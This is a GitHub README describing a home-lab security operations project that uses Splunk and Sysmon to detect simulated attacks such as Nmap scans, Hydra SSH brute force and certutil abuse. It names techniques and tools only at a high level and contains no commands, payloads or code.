MiguelKnt/Security-Operations-Detection-Engineering-Platform

# Security Operations & Detection Engineering Platform ## Overview Designed and deployed a multi-platform Security Operations environment utilizing Splunk Enterprise, Sysmon, Windows 11, Kali Linux, Ubuntu Server, and Splunk Universal Forwarders to simulate enterprise SOC operations, centralized telemetry collection, detection engineering, threat hunting, and incident investigation workflows. This project focuses on building security visibility, validating detection coverage, investigating security events, and developing practical security operations skills through hands-on adversary simulation and telemetry analysis. ## Technologies Used - Splunk Enterprise - Sysmon - Splunk Universal Forwarder - Windows 11 - Kali Linux - Ubuntu Server - Atomic Red Team - Nmap - Hydra - PowerShell - MITRE ATT&CK Framework ## Key Capabilities - Centralized log collection and telemetry ingestion - Endpoint visibility through Sysmon - Detection engineering and alert validation - Security monitoring and event correlation - Threat hunting workflows - Incident investigation and analysis - ATT&CK-aligned adversary simulation - Network reconnaissance detection - SSH brute-force detection - HTTP beaconing analysis - PowerShell abuse detection - Living-off-the-Land (LOLBin) abuse detection using Certutil ## Security Activities Performed ### Detection Engineering Developed and validated detections designed to identify suspicious activity across Windows and Linux environments, leveraging Splunk searches, alerting logic, and Sysmon telemetry. ### Adversary Simulation Executed controlled attack simulations to generate security telemetry and validate monitoring coverage. Activities included: - Network reconnaissance using Nmap - SSH brute-force attacks using Hydra - HTTP beaconing simulations - PowerShell execution testing - Certutil LOLBin abuse simulations ### Threat Hunting & Investigation Performed investigation and threat hunting activities by correlating endpoint, authentication, application, and network telemetry to identify attacker-attributed behavior and validate detections. ## Skills Demonstrated - Security Operations (SOC) - Detection Engineering - Threat Hunting - Incident Investigation - Security Monitoring - Log Analysis - SIEM Administration - Threat Detection - Endpoint Telemetry Analysis - MITRE ATT&CK Mapping - Windows Security Monitoring - Linux Security Monitoring ## Project Documentation The complete project walkthrough, screenshots, detection examples, investigations, and technical documentation can be viewed below: 📄 **Project Documentation** [Security Operations & Detection Engineering Platform – Part 1](https://github.com/MiguelKnt/Security-Operations-Detection-Engineering-Platform/blob/main/Security_Operations_and_Detection_Engineering_Platform_Part_1.pdf) ## Future Enhancements Planned enhancements include: - Security orchestration and automated response (SOAR) - Expanded ATT&CK coverage - Additional threat hunting scenarios - AI-assisted alert triage workflows - Automated investigation workflows - Detection tuning and optimization - Enhanced dashboarding and reporting *This project was developed as part of an ongoing effort to strengthen practical skills in security operations, detection engineering, threat hunting, and enterprise security monitoring.*